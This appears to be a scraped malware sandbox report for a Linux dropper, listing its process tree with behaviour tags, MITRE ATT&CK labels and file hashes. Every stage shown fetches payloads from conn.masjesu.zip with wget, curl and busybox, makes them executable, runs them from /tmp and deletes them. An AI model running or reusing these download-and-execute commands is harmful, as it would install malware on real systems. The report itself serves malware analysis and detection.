/bin/rmrm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- System Network Configuration Discovery
PID:952
-
-
/bin/chmodchmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- System Network Configuration Discovery
PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:963
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- System Network Configuration Discovery
PID:966
-
-
/bin/chmodchmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:969
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- System Network Configuration Discovery
PID:970
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- System Network Configuration Discovery
PID:973
-
-
/bin/chmodchmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:976
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- System Network Configuration Discovery
PID:977
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- System Network Configuration Discovery
PID:980
-
-
/bin/chmodchmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- System Network Configuration Discovery
PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- System Network Configuration Discovery
PID:994
-
-
/bin/chmodchmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- System Network Configuration Discovery
PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/chmodchmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:1004
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- System Network Configuration Discovery
PID:1005
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1006
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- System Network Configuration Discovery
PID:1008
-
-
/bin/chmodchmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- File and Directory Permissions Modification
PID:1009
-
-
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Executes dropped EXE
PID:1010
-
-
/bin/rmrm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:1011
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97